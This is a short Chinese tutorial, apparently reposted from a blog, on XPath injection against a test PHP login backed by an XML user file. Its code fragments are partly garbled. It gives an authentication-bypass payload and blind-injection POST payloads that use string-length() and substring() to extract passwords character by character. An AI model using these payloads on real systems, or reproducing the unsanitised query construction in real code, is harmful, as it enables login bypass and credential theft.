xpath注入与盲注

XPath是一种查询语言，描述如何在XML文档中查找特定元素（包括属性、处理指令等），于sql相似，Xpath可以引用XML文档的几乎任何部分，而不受访问控制限制。

XPath盲注可以从一个使用不安全方式嵌入用户信息的应用中提取数据，在输入未被过滤的情况下，攻击者可以提交并执行有效的XPath代码。这种攻击适用情况：攻击者不清楚XML文档的架构，或者错误消息被抑制，一次只能通过布尔化查询来获取部分信息，与SQL盲注相似。

测试

//xpath_user.xml<users><user id="1" username="admin" passWord="admin">user><user id="2" username="root" password="admin">user><user id="3" username="system" password="system">user>users>

//xpath.PHP                                                                                
    用户名：
    密码：
                            
        xpath($sql);                if(count($resulit)==0){                        echo '登录失败';                }else{                        echo "登录成功";                }        }        }?>

php件的用户登录使用的信息来自xml文件

$sql="//user[@username='{$username}' and @password='{$password}']";select * from users where username='username' and password='password';两个语句效果是相似的，实现的功能就是提取用户名和密码

方法

注入方法

万能密码： admin’ or ‘1’='1

x-www-from-urlencoded(raw): username=admin’ or ‘1’=‘1’ &password=xxxxxx&submit=submit

登陆成功

盲注方法

string-length()获取字符长度

substring 截取字符

注入语句（post data）

username=admin’and string-length(@password)=6 or ‘1’='1&password=0&submit=submit

获取长度，返回成功则表示长度正确

username=admin’and substring (@password,1,1)=‘a’ or ‘1’='1&password=0&submit=submit

尝试第一个字母是否为a，返回成功则表示字母正确，以此类推可以遍历出所有信息

来源地址：https://blog.csdn.net/RMC131/article/details/130251977